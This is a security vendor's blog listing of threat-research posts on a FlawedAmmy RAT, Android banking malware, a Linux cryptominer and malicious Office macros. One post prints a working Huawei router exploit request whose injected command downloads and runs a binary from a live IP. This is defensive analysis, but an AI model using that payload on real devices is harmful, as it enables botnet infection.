Windows Malware Family FlawedAmmy Disassembled

/in /by

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity in July for the “FlawedAmmy”, Windows RAT, Malware Family. SonicWall has covered malicious MS-Office files being used to distribute “FlawedAmmy” in the past by phishing campaigns. Phishing campaigns cover larger populations of victims, and are usually sent to the masses instead of personalized Spear-Phishing campaigns sent to individuals. Today, we will cover the actual disassembly of the Windows “FlawedAmmy” RAT malware that is executed after the VBA Macro code is executed.

Remote Access Trojans (RAT), sometimes called Creep-ware can allow an attacker to gain complete control over the system. An attacker can do almost anything that someone physically sitting at the computer can do, including using any 3rd party device connected to the machine.

Stage 1 – Static Information:

Packer & Entropy Information:

Retrieving & Unpacking The Sample:

Unpacking the sample can be completed by toggling a break point on VirtualAlloc. VirtualAlloc will be called multiple times creating three buffers. The first buffer that is used is hidden executable code. Which can be seen here:

Translating this buffer into code will allow you to see the hidden code that is executed. Looking closer the sample uses the imports VirtualAlloc, GetProceAddress, VirtualProtect, LoadLibraryA, VirtualFree, and VirtualQuery:

The second buffer is that of an encrypted PE File. We can see half of it starting to be decrypted here:

The third buffer will be the decrypted PE File. Once we see this buffer decrypted we can dump the new PE File to disk. This will be Stage 2:

Xor Encryption Used:

Routine One:

Routine Two:

Stage 2 – Static Information:

Packer & Entropy Information:

Static Network Indicators:

Anti-AntiVirus Techniques:

  • BullGuard.exe – AntiVirus
  • bdss.exe – BitDefender Core Component
  • bdagent.exe – BitDefender Total Security Component
  • V3Main.exe – AhnLab V3 Light
  • V3SP.exe – AhnLab V3 Light
  • PSUAMain.exe – Panda Internet Security

ProcMon Analysis:

During our testing, the sample actively loaded 88 modules (.dlls) while executing. The sample also opens 2,263 registry keys during operation. Starts two services called, “AMMYY” and “Foundation”. The location of files:

  • C:\ProgramData\AMMYY\wmihost.exe
  • C:\ProgramData\AMMYY\settings3.bin
  • C:\ProgramData\Foundation\wmites.exe
  • C:\ProgramData\Foundation\settings3.bin
  • C:\ProgramData\Foundation1\wmites.exe
  • C:\ProgramData\Foundation1\settings3.bin
  • C:\ProgramData\Microsoft\wsus.exe
  • C:\ProgramData\Microsoft\settings3.bin
  • C:\ProgramData\Microsoft Help\wsus.exe
  • C:\ProgramData\Microsoft Help\settings3.bin
  • C:\ProgramData\Microsoft Help\wsus_41b480.tmp

Loads one driver called winspool.drv.

If the sample detects you are trying to debug the services and processes it has running. It will stop and delete them as seen in the picture below:

Deletes original file using ShellExecute:

Supported Systems:

  • 5.1 or 5.2 (Windows XP x86 & x64) & (Windows Server 2003 & R2)
  • 6.1 (Windows Server 2008 R2 & Windows 7)
  • 6.2 (Windows Server 2012 & Windows 8)
  • 6.3 (Windows Server 2012 R2 * Windows 8.1)

No-Support for Minor Version 6.4 and Windows 10.
Microsoft never came out with a Minor Version for 6.4. So, return “9” is an error.

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: FlawedAmmyy.RAT (Trojan)

Cyber Security News & Trends – 07-05-19

/0 Comments/in /by

This week, SonicWall data continues to drive innovation in the cybersecurity space, the biggest cybersecurity crises of 2019 so far, and FireEye reconsiders its choice of keynote speaker for this year’s Cyber Defense Summit following online backlash.

SonicWall Spotlight

Three-Tiered Security for the Internet of Things Engineering.com

  • Galvanized by data from the 2019 annual SonicWall Cyber Threat Report, which shows a rapid increase in Internet of Things (IoT) attacks, cybersecurity researchers are doubling down on efforts to improve security in IoT by tackling vulnerabilities in microcontroller units (MCUs). Avnet and Microsoft have partnered in one such effort, designing the infrastructure of hardware along with its software and cloud-ecosystem to deliver Azure Sphere.

SonicWall TZ300P Review: A Multi-Site Marvel – IT Pro

  • IT Pro reviews the SonicWall TZ300P, a versatile and affordable firewall, built with SMBs and remote offices in mind. The commendatory review concludes that the TZ300P delivers a “wealth of security measures at a great price.”

Cybersecurity News

The Biggest Cybersecurity Crises of 2019 So Far – Wired

  • From the Perceptics breach to LockerGoga to supply chain attacks on Microsoft and Asus, Wired provides an overview of the biggest cyberattacks reported in the first half of the year.

Hillary Clinton Withdraws From Cybersecurity Conference Speaking Gig, Citing ‘Unforeseen Circumstance’ – The Epoch Times

  • Following online backlash to a controversial keynote speaker announcement for this year’s FireEye Cyber Defense Summit, FireEye has announced in an email this week that Hillary Clinton will no longer be participating in this year’s conference as the keynote speaker citing “unforeseen circumstance.”

Hackers in Md. Breach Accessed Names, Social Security Numbers of up to 78,000 People – The Washington Post

  • A labor department breach in Maryland has resulted in the exposure of names and Social Security numbers belonging to as many as 78,000 people who received unemployment in 2012 or who sought a general equivalency diploma in recent years.

Confirmed: 2 Billion Records Exposed In Massive Smart Home Device Breach – Forbes

  • Researchers from vpnMentor have uncovered a database housing more than 2 billion logs containing everything from user passwords to account reset codes and even a “smart” camera recorded conversation. The database, belonging to Chinese company Orvibo, was not password protected.

US Border Agency Cuts Ties with Breached Surveillance Contractor – The Verge

  • US Customs and Border Protection has suspended all federal contracts with Perceptics, a surveillance contractor suspected of suffering a data breach first reported in May.

And finally:

WannaLocker Ransomware Found Combined with RAT and Banking Trojan – SC Magazine

  • Researchers are warning that a new version of WannaLocker – essentially a mobile derivative of WannaCry ransomware – has been enhanced with spyware, remote access trojan and banking trojan capabilities.

In Case You Missed It

Android Brazilian banker with Spyware, Phishing and Ransomware components

/in /by

SonicWall Capture Labs Threats Research team observed an Android banking malware that has additional components – Spyware, Ransomware, RAT (Remote Access Trojan). Even though this malware appears to be a work in progress, it is still potent enough to cause devastative effects if it infects the right individuals. Currently this malware is targeting Brazilian banks and one of its functionality centers towards stealing Credit Card details of its victims.

Infection Cycle

Upon installation it uses the icon and application name of Google Protect, based on this there is a possibility that this malicious application spreads under the guise of Google Play Protect:

Once executed it displays a screen which states “Activate Protection”, upon clicking the button this malware takes us to the home screen and its icon vanishes from the app drawer. But the malware continues to execute in the background as shown below, this is a typical behavior exhibited by a number of malicious samples:

Initial Network Communication

The malware communicates with the server starting by registering itself once it infects the device:

Sensitive information shared by the malware with the server includes:

  • Phone number
  • Gmail account email
  • Device manufacturer
  • Device model

The malware then upgrades the protocol from HTTP to WebSocket thereby using Websockets as a medium to communicate further:

Soon we started observing commands being sent by the server and the malware’s response to these commands, both were carried out via WebSockets.

Command Structure

The WebSocket direction incoming refers to the commands sent by the server in the variable extra and the direction outgoing refers to the malware’s response to said commands. We have highlighted few interesting ones that we observed during our analysis:

Incoming command – info_list – sends information about the device:

Incoming Command – callLog – sends the call log from the infected device:

Incoming command – contacts – sends contacts stored on the infected device:

Incoming command – ls followed by path of the directory  – sends contents of the directory:

Incoming command – dl followed by path to a file  – sends a particular file to the attacker’s server. In the below example an image file was ex-filtrated from our infected device:

The following image shows a glimpse of hard-coded commands present in the code:

Below is a complete list of commands supported by this malware:

Apart from the commands above there are traces in the code that indicate this malware is capable of the following:

  • Extract GPS related data from the device
  • Record audio from the microphone and save the recordings locally (which can later be ex-filtrated)

Considering that this malware contains abilities to receive and execute commands and the fact that one of the commands is to DDOS a target, there is a possibility that this malware can be operated as a botnet. Additionally based on the commands above this malware can act as a Remote Access Trojan (RAT), perform phishing and extract sensitive information like a spyware.

Banking Targets

This malware contains a list of hard-coded Brazilian banking app names. Additionally there are a number of strings in Portuguese making it apparent that this malware is targeted towards Brazilian users:

If an app from this list is opened, for instance com.santander.app, the malware shows a notification stating – “For your security, we ask that you validate your in-app access data from the Santander Bank”:

Following this it asks the victim for their Credit Card details:

We suspect this information to be saved on h[xx]ps://androidrat-f5006.firebaseio.com/kl_android/infosanta

Ransomware Component

The malware also contains a ransomware component, but this did not work for us during our time analyzing this threat. There is a class named RansoActivity and within this class is present a typical ransomware message which translates to:

  • All your files have been encrypted and if payment is not made in BTC within the stipulated period all your files will be deleted permanently.

 

Additional Notes

  • VirustotalRelations can be used to understand if a malware belongs to a larger campaign. We tried to see possible connections of few hardcoded URL’s present in this malware but it did not give us further leads:

  • The developer name for this app is Ervadark Socity, we could not find anything else related to this developer
  • The malware gets updated by downloading an update and storing it in the /Download/ folder as update.apk

Closing Thoughts

Overall it is difficult to categorize this malware considering its list of different functionalities. This malware is capable of targeting users of Brazilian banks and attempt to steal their Credit Card details by showing them phishing pages. Additionally this malware can execute commands sent by an attacker and spy on its victims and finally this malware also has a ransomware (which did not work for us) and DDOS components.

Giving a specific category to this malware is a tough ask !

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOS.PhishRansom.LK (Trojan)
  • GAV: AndroidOS.PhishRansom.BK (Trojan)

Details of the sample analyzed:

  • MD5: 78c9bfea25843a0274c38086f50e8b1c
  • Package name: com.google.protect
  • Application name: Google Protect
  • Developer name: Ervadark Socity

Banking targets of this application:

  • br.com.bb.android
  • com.bradesco
  • com.itau
  • com.itau.empresas
  • com.santander.app
  • com.santandermovelempresarial.app
  • br.com.bradesco.next
  • br.com.original.bank
  • br.com.intermedium

 

Switch to SonicWall: 8 Reasons to Trade In Your Old Firewall

/0 Comments/in /by

Choosing a cybersecurity provider you trust is no easy task. So many factors need to be considered, prioritized and balanced.

  • You need to stop cyberattacks, but want to ensure you’re with the right company.
  • You need a firewall, but want more than a hardware vendor.
  • You need a sandbox, but want to know it works without affecting performance or business operations.
  • You need to manage your ecosystem, but want to do it from a single view that’s accessible anywhere.
  • You need an end-to-end platform, but want to know it’s more than marketing buzz.
  • You need an enterprise-grade solution, but you want something that’s affordable with today’s tight budgets.

If you’re ready for a change, I ask that you consider SonicWall, a cybersecurity veteran with nearly three decades of experience stopping cyberattacks and defending organizations in the cyber arms race.

Explore the many real-world reasons customers of Cisco, Juniper, Sophos, and WatchGuard are switching to SonicWall for good. And not looking back.

SonicWall helps protect you everywhere. Automatically.

Cybersecurity layered across your organization.

SonicWall protects you from the perimeter to the endpoint. Our integrated Capture Cloud Platform scales automated real-time breach detection and prevention across email, wireless, wired, cloud and mobile networks.

Top-ranked firewalls with budget-saving TCO.

NSS Labs gave SonicWall a ‘Recommended’ rating and placement in the upper-right quadrant of the 2018 Security Value Map™ for next-generation firewalls. Security effectiveness and overall value helped SonicWall achieve the rating for the fifth time.

Multi-engine malware mitigation.

Through anti-evasion and ‘block until verdict’ capabilities, the multi-engine Capture Advanced Threat Protection (ATP) cloud sandbox ensures even the most advanced malware and cyberattacks are mitigated. Limited, single-engine approaches don’t deliver the same efficacy and scale of attack prevention.

Security against ‘never-before-seen’ attacks and processor threats.

Included in the Capture ATP sandbox service, SonicWall Real-Time Deep Memory Inspection (RTDMITM) identifies and mitigates memory-based attacks, including Meltdown, Spectre, Foreshadow, PortSmash and Spoiler exploits, malicious PDFs and Microsoft Office files.

Management and analytics via a ‘single pane of glass.’

SonicWall Capture Security Center offers the ultimate in visibility, agility and capacity to centrally govern the entire SonicWall security ecosystem with greater clarity, precision and speed — all from a single console.

Deep SSL and TLS inspection.

SonicWall DPI-SSL scans SSL/TLS traffic to properly decrypt, inspect, detect and mitigate hidden cyberattacks. Many vendors either can’t inspect encrypted traffic or force you to block all traffic to prevent attacks over HTTPs.

True ransomware protection.

SonicWall detects and prevents ransomware attacks — like Cerber, BadRabbit, Nemucod, WannaCry, Petya and NotPetya — before they can breach your network and encrypt your data.

Endpoint protection with automated rollback.

SonicWall Capture Client, powered by SentinelOne, is modern, next-generation endpoint protection for today’s hybrid environments. SentinelOne is the top-ranked endpoint protection technology in the NSS Labs Advanced Endpoint Protection (AEP) Security Value Map and received the coveted ‘Recommended’ rating.

Passate a SonicWall: 8 motivi per permutare i vecchi firewall

/0 Comments/in /by

Scegliere un fornitore di cibersicurezza di fiducia non è facile. Sono tanti i fattori da considerare, prioritizzare e ponderare.

  • È necessario bloccare i ciberattacchi, ma bisogna avere l’interlocutore
  • È necessario un firewall, ma bisogna contare su qualcosa di più di un semplice fornitore di hardware.
  • È necessaria una sandbox, ma bisogna essere certi che funzioni senza ripercussioni sul rendimento e sulle attività aziendali.
  • È necessario gestire il proprio ecosistema, ma bisogna farlo da un unico osservatorio accessibile da qualsiasi parte.
  • È necessaria una piattaforma end-to-end, ma bisogna sapere che è qualcosa di più di un un’operazione di marketing non convenzionale.
  • È necessaria una soluzione a livello aziendale, ma bisogna trovare qualcosa che sia fattibile tenendo conto delle odierne limitazioni di budget.

Se siete pronti per il cambiamento, vi chiedo di prendere in considerazione SonicWall, una vecchia conoscenza della cibersicurezza con circa trent’anni di esperienza nel bloccaggio dei ciberattacchi e nella difesa delle organizzazioni nella corsa ai ciberarmamenti.

Conoscete le numerose ragioni effettive per le quali i clienti diCisco, Juniper, Sophos e WatchGuard stanno passando definitivamente a SonicWall. E senza ripensamenti.

SonicWall contribuisce a proteggervi dovunque e in modo automatico.

Cibersicurezza multilivello per l’intera organizzazione.

SonicWall offre una protezione completa, da quella perimetrale a quella dell’endpoint. La nostra Capture Cloud Platform integrata attiva automaticamente il rilevamento e la prevenzione delle violazioni in tempo reale per la posta elettronica, le reti wireless, le reti cablate, il cloud e le reti mobili.

Firewall di fascia alta con un costo totale della proprietà che consente di risparmiare sul budget.

NSS Labs ha attribuito a SonicWall il rating “Recommended”, collocandolo nel quadrante superiore destro della 2018 Security Value Map™ per i firewall di prossima generazione. L’efficacia della sicurezza e il valore complessivo hanno consentito a SonicWall di aggiudicarsi la qualifica per la quinta volta.

Mitigazione malware multi-engine.

Grazie alle funzionalità anti-evasione e di “blocco fino a verdetto”, la sandbox multi-engine per cloud Capture Advanced Threat Protection (ATP) garantisce la mitigazione anche del malware e dei ciberattacchi più sofisticati. Soluzione isolate di tipo single-engine non garantiscono la stessa efficienza e la stessa entità di prevenzione degli attacchi.

Sicurezza contro attacchi “mai visti prima d’ora” e minacce ai processori.

Del servizio sandbox di Capture ATP, fa parte SonicWall Real-Time Deep Memory Inspection (RTDMITM.) che identifica e mitiga gli attacchi basati sulla memoria, tra cui gli exploit Meltdown, Spectre, Foreshadow, PortSmash e Spoiler, file PDF e file Microsoft Office dannosi.

Gestione e analisi in modalità SPOG (“da un unico pannello di controllo”)

SonicWall Capture Security Center offre quanto di meglio in fatto di visibilità, agilità e capacità di gestire centralmente l’intero sistema di sicurezza SonicWall con maggiore chiarezza, precisione e rapidità, il tutto da un’unica consolle.

Ispezione approfondita SSL e TLS.

SonicWall DPI-SSL scansiona il traffico SSL/TLS per decriptare, ispezionare, rilevare e mitigare correttamente i ciberattacchi nascosti. Molti prodotti della concorrenza non sono in grado di ispezionare il traffico crittografato o costringono a bloccare tutto il traffico per prevenire gli attacchi tramite HTTP.

Vera protezione contro i ransomware.

SonicWall rileva e previene gli attacchi ransomware, come Cerber, BadRabbit, Nemucod, WannaCry, Petya e NotPetya, prima che facciano breccia nella rete crittografando i dati.

Protezione degli endpoint con ripristino automatico.

SonicWall Capture Client, che utilizza la tecnologia SentinelOne, è una moderna protezione degli endpoint di prossima generazione per gli odierni ambienti ibridi. SentinelOne è considerata la migliore tecnologia di protezione degli endpoint nella NSS Labs Advanced Endpoint Protection (AEP) Security Value Map e ha ricevuto l’ambìto rating “Recommended”.

New wave of attacks attempting to exploit Huawei home routers

/in /by
SonicWall has observed a new wave of attacks targeting Huawei home routers in attempt to exploit the vulnerability CVE-2017-17215.
 
The attack started by scanning internet-facing IP’s on port 37215 and then attempting to POST the below command:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30″, uri=”/ctrlt/DeviceUpgrade_1″, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5″, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669″
xml version=”1.0″
><s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:Upgrade xmlns:u=”urn:schemas-upnp-org:service:WANPPPConnection:1″><NewStatusURL>$(/bin/busybox wget -g 103.83.157.41 -l /tmp/binary -r /bins/mips
/bin/busybox chmod 777 * /tmp/binary
/tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Once the vulnerability is exploited successfully on the target router, the following shell commands will be executed on the target router:
 
/bin/busybox wget -g 103.83.157.41 -l /tmp/binary -r /bins/mips // Download and save file
At the time of writing this article, malware download site is active in delivering payloads to the exploited routers. It provides support for a wide range of target architectures, including mips, arm, x86,mpsl, ppc, sh4, m68k and others.

 

 

/tmp/binary huawei // Execute file

When executed, these binaries connect to their CnC, can receive commands to conduct various types of DoS such as UDP DoS and TCP DoS attacks against a given target.

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13151 Huawei HG532 Remote Command Execution
GAV: (Cloud Id: 71637770) Mirai.O (Trojan)
GAV: (Cloud Id: 71634637) Mirai.O (Trojan)
GAV: (Cloud Id: 71637780) AELtrojan (Trojan)
GAV: (Cloud Id: 71636342) SMMR1 (Trojan)
GAV: (Cloud Id: 71637710) SMMR1 (Trojan)
GAV: (Cloud Id: 71638263) AELtrojan (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)
GAV: (Cloud Id: 71637583) Mirai.O (Trojan)
GAV: (Cloud Id: 71635399) Mirai.O (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)

Cryptomining trojan targeting Linux platforms seen in the wild

/in /by

This week, the Sonicwall Capture Labs team came across another cryptominer that targets the Linux platform. This Trojan arrives armed with functionalities to ensure successful infection including using rootkit and known Linux exploits.

Infection Cycle

This Trojan comes as a bash file with over 800 lines of codes. Its main function is to mine cryptocurrency using the Stratum mining protocol and cryptonight algorithm on pools such as supportxmr.com, minexmr.com, poolin.com, dwarfpool.com, nanopool.com and f2pool.com. To gain root access and basically full control of the victim machine it uses BRootkit, leverages a vulnerability –  CVE-2016-5195 and uses BillGates Linux malware.

The script consists of the following sub functions:

  • BasicInit – to check connectivity, ping the remote host (auth.to0ls.com or 90.140.35) and check the platform type by checking the “issue” file to identify whether it is CentOS, Ubuntu or Debian.
  • RunInBack – to get root access it will download another component that uses a known exploit called Dirty Cow (CVE-2016-5195) – a privilege escalation vulnerability in the Linux kernel.
  • WorkProc – main mining function
  • Dandelion – it tries to infect other systems by looking at
  • Scavenger – it kills services and uninstalls the following: safedog, aegis, yunsuo, clamd, Avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.
  • SetStartup – downloads the nohup utility if not present and add itself as a local daemon in
  • Rootkit – it downloads and runs a rootkit called BRootkit (available here) whose functionalities include getting root access, hiding processes, directories and network connections among many others.
  • GetRootAccess – more functionalities to get root access using DirtyCow exploit
  • Checkupdate – check for the most current version on the remote host
  • Guard – Downloads another known linux Trojan called BillGates. It uses its functionality “CleartheGates” opening ports and services and nearly taking full control over the infected system.

This malware author clearly took the time to guarantee persistence and successful infection.

SonicWALL Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.LNX (Trojan)
  • GAV: Billgates.ELF (Trojan)
  • GAV: CVE-2016-5195.DC (Exploit)
  • GAV: BRootkit.LNX (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

AI, Threat Intelligence and The Cyber Arms Race: SonicWall CEO Bill Conner Joins Chertoff Group Security Series Event

/0 Comments/in , /by

SonicWall President and CEO Bill Conner was featured as part of an exclusive group of cybersecurity thought-leaders at The Chertoff Group Security Series Event, “AI, Threat Intelligence and The Cyber Arms Race,” on June 18.

Conner was flanked by Christopher Krebs, Director of Cybersecurity and Infrastructure Security Agency (CISA) in the Department of Homeland Security; Dimitri Kusnezov, Deputy Under Secretary for Artificial Intelligence & Technology, Department of Energy; along with panel moderator Chad Sweet, Chief Executive Officer and Co-Founder, The Chertoff Group.

Together, they took to the stage to discuss how AI solutions are being leveraged to prevent, detect and respond to the cyber threats attacking both critical public infrastructure and the private sector.

The wide-ranging discussion took on everything from election cybersecurity to self-driving cars, but was grounded by a focus on how AI is increasingly growing in importance when running cyber defenses in both the public and private sectors.

With this in mind, they looked at the increasing number of ‘have and have-nots’ in these areas with Conner pointing out that an underfunded agency or a small company simply doesn’t “have the resource — capital or human” to defeat a major cyberattack without AI-based cyber defenses such as SonicWall Real-Time Deep Memory InspectionTM (RTDMI) that can both detect and prevent existing and never-before-seen cyberattacks as they appear.

From left to right, The Chertoff Group co-founder Chad Sweet, CISA director Christopher Krebs, DOE Deputy Under Secretary Dimitri Kusnezov and SonicWall CEO Bill Conner converse during The Chertoff Group Security Series June 18 in Maryland.

‘It starts with the chip’

The conversation moved on to discuss current types of cyberattacks and how growth in 5G, while increasing exponentially, is leaving itself open to sophisticated state-sponsored attacks because the industry has still not fully agreed upon a security standard.

They agreed that in 2019 cybersecurity has to go all the way down to the supply chain and chip level, especially when considering ongoing controversies over alleged government influence on companies like Huawei, and confirmed tech problems like the side-channel vulnerabilities in Intel chips. In Bill Conner’s words, “It does start with the chip … because that’s everywhere.”

Watch the whole video (provided above) for the in-depth consideration of the threats posed by Internet of Things (IoT) growth, a lively Q&A session with the audience, and the astute observation that modern cyber threats are borderless and not bound by the same rules as other threats.

“Tariffs and borders are all interesting. They’re all the rage these days,” said Conner. “But cyber doesn’t care about that … we have to think differently … we learned how to fight air, land and sea, [now] we’re learning how to fight cyber.”

About the Chertoff Group Security Series

Since 2013, The Chertoff Group Security Series has become a respected community building event to discuss important national security and risk management issues, highlight innovation, and network with leading practitioners, policy makers, investors, and thought leaders.

The Chertoff Group Security Series convenes CEOs, CSOs, CIOs, CISOs, COOs, General Counsels, senior agency leadership, and senior IT risk executives from both the public and private sectors. The forum welcomes technology and security leaders across a variety of industries whose operational business decisions are impacted by technology and are seeking insight on role of policy in today’s global technology business market.

Cyber Security News & Trends – 06-28-19

/0 Comments/in /by

This week, SonicWall is featured on Reuters TV, federal cybersecurity is found to be seriously out of date, and a young hacker is taking down Internet of Things botnets by bricking as many IoT objects as he can.

SonicWall Spotlight

To Pay or Not To Pay: U.S. Cities With Ransomware – Reuters

  • SonicWall’s Dmitriy Ayrapetov is featured demonstrating a ransomware attack in this Reuters video segment investigating the current increase in ransomware attacks on US cities.

HiddenTear Ransomware Variant Encrypts and Gives Files .Poop Extension – SonicAlert

  • The SonicWall Capture Labs Threat Research Team came across some childish ransomware which, after replacing your files with a “.poop” extension, updates your background with a poop emoji. It is, however, real ransomware and should be treated as such; SonicWall protects you from it.

Cyber Security News

U.S. Carried Out Cyberattacks on Iran – New York Times

  • Multiple news outlets report that the United States Cyber Command conducted online attacks against an Iranian intelligence group after physical strikes were called off. Full details on what was attacked are not known and US Cyber Command have not released any information.

Federal Cybersecurity Defenses Are Critical Failures, Senate Report Warns – CNBC

  • After a 10-month review of federal agencies, a damning 99-page report on federal cybersecurity has been released. Details include failures to apply mandatory security patches, ignoring well-known threats and weaknesses for a decade or more, and outdated systems with at least one case of a 50-year-old system still in use in 2019.

NASA Hacked Because of Unauthorized Raspberry Pi Connected to Its Network – ZDNet

  • NASA confirmed that in April 2018 a hacker breached their security using a Raspbery Pi device and accessed around 500 megabytes of data, including information on the ongoing Mars Curiosity Rover mission. The full investigation into what happened is still ongoing.

The Hotel Hackers Are Hiding in the Remote Control Curtains – Bloomberg

  • Bloomberg hitch a ride with some IT consultants who are investigating the rise of cyberattacks on hotels – seen by the hacking community to be both lacking in basic cybersecurity and as a massive database of personal information.

Hackers Strike Another Small Florida City, Demanding Hefty Ransom – Wall Street Journal

  • Lake City officials in Florida agreed to pay 42 bitcoins, around $500,000, in a ransom less than a week after another Florida City, Riviera Beach, paid a similar amount to retrieve their data.

A Firefox Update Fixes yet Another Zero-Day Vulnerability – Engadget

  • Mozilla patched two zero-day vulnerabilities over the past week, with the second coming only 48 hours after the first. Both zero-days used the same attack and they appeared to be targeting Coinbase employees directly.

Riltok Banking Trojan Begins Targeting Europe – SC Magazine

  • The Riltok banking trojan, originally intended to target Russians, has been modified to target the European market. It is spread via a link in a text message that, if clicked, directs the user to a website that prompts them to install a fake update of advertising software.

And finally:

Thousands of IoT Devices Bricked By Silex Malware – Threat Post

  • A 14-year-old hacker has been spreading anti-Internet of Things malware because he wants to stop other hackers using the devices for botnets. At the time of writing at least 4,000 devices have been bricked by his malware.

In Case You Missed It

Malicious Office files are seen distributing FlawedAmmyy RAT

/in /by

SonicWall Capture Labs Threat Research Team identified a new wave of malicious Office files being used to distribute Remote Administration Tool belonging to FlawedAmmyy family. It has been observed that both MS-Excel and MS-Word files containing VBA Macro code are used to download and execute the FlawedAmmyy malware.

Infection cycle
Macro code is executed upon enabling macros when the Office file that comes as an email attachment is opened, its purpose is to download a Windows Installer file (MSI file) and execute it.

MSI file on execution further drops a file in folder “%systemdrive%\programData\”. Dropped filename observed to be either WSUS.exe or hkmoov.exe and belongs to FlawedAmmyy family. MSI file and dropped file have a valid digital signature.

Different variants of Office files that have this behavior are spotted in the wild.

Variant 1
The first variant was spotted on 20-May-2019. Upon opening the malicious Office attachment, an image is displayed with a message in the Korean language to enable Macros as shown below:


Fig-1: image displaying message to enable macros

This variant contains malicious code in a single subroutine which is executed as soon as the macros are enabled after opening the file as shown below:


Fig-2: Macro Code

As can be seen in the above image, the tag part of UserForm in Macro contains a URL from where the payload is downloaded.

 

Variant 2
The second variant was first observed on 27-May-2019. The only change observed in this variant is that the malicious code was moved into multiple modules as shown below:


Fig-3: Macro Code moved into multiple modules

 

Variant 3
The third variant was first observed on 18-June-2019. With this variant we observed a number of changes as mentioned below:

  1. MS-Word files were used to distribute FlawedAmmyy.
  2. The Windows installer [msiexec] is used to execute the downloaded payload, whereas Windows command  Processor [cmd ]was used in earlier variants
  3. The displayed message is in the English language as shown below


Fig-4: Text in English language


Fig-5: Macro Code using msiexec to execute the downloaded payload

 

Variant 4
The fourth variant was first observed on 19-June-2019. This variant moved back to use MS-Excel files and displays the message in the Korean language.


Fig-6: Macro Code

The malware is using a number of images in each variant having the same message as shown below:

Image1

Image2

Image3

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: MalOffice.J0(Trojan)
  • GAV: MalOffice.J1 (Trojan)
  • GAV: MalOffice.J3 (Trojan)

This threat is detected pro-actively by Capture ATP w/RTDMI


Capture ATP Report

Indicators Of Compromise

  • SHA-256:
    • 0bf1d095454317a64356e70a8cb33e7d995d73fff4967343187712514f594e9c
    • ea367af7f8f23bc6a8c16eaf184bf7ab36c37de8e1d39fb44b66e64f9c0f2401
    • 289b1d7e986cc1d1e45be551333654bf738c32b38ac9ea6e93a48eddfe9fb1bd
    • 9e96ee05ba30ad07d0748f93c45c2b38a7076d9ccf791f129a85cf19cfa51ba9
    • 481fd12b8b8774a07c2b6d7713e3fd6ee45bf40054cd3be6acb0d061418b1d1c
    • 70d46db11c64062ff93111137c530d180668685d1a19997365156876723ed7ee
    • 10f163f27391c8a9cae6676af2871604b34fbc0cff548b086cd5d1cfe1007949
    • eb3792fc83cd65823bc466e7253caf12064826b058230666d2ed51542ac59275

    Network Connections

    • http://lec[removed]ss.top/tmp
    • http://lec[removed]ss.top/tmp2
    • http://tra[removed]ser.net/tmp
    • http://sta[removed]sdr.top/q3
    • http://sta[removed]sdr.top/q4
    • http://149.[removed]09.70/02m
    • http://179.[removed]47.77/pm1

    Payload SHA-256:

    • a1e8b9e0b10a9fa979ac90f08721b237d6d2c000313855442f1a88aca43e709a
    • 9de446b29f7ac43609a4026a89e240809cd98cf33963387a708a4fd3d72bce6b
    • c24ab9d90ba0dd363de5cac13a27758a9951f5f60dd7ecbf3f458d9d80cee432
    • 780f9626deadfd727a536d19a6f007f1d0a6596b37d3ae5fe84058493f406b90
    • bc7a23485a8c10672ebc7c998687fe837ab296e01fbf36fde08a8ce013ff67be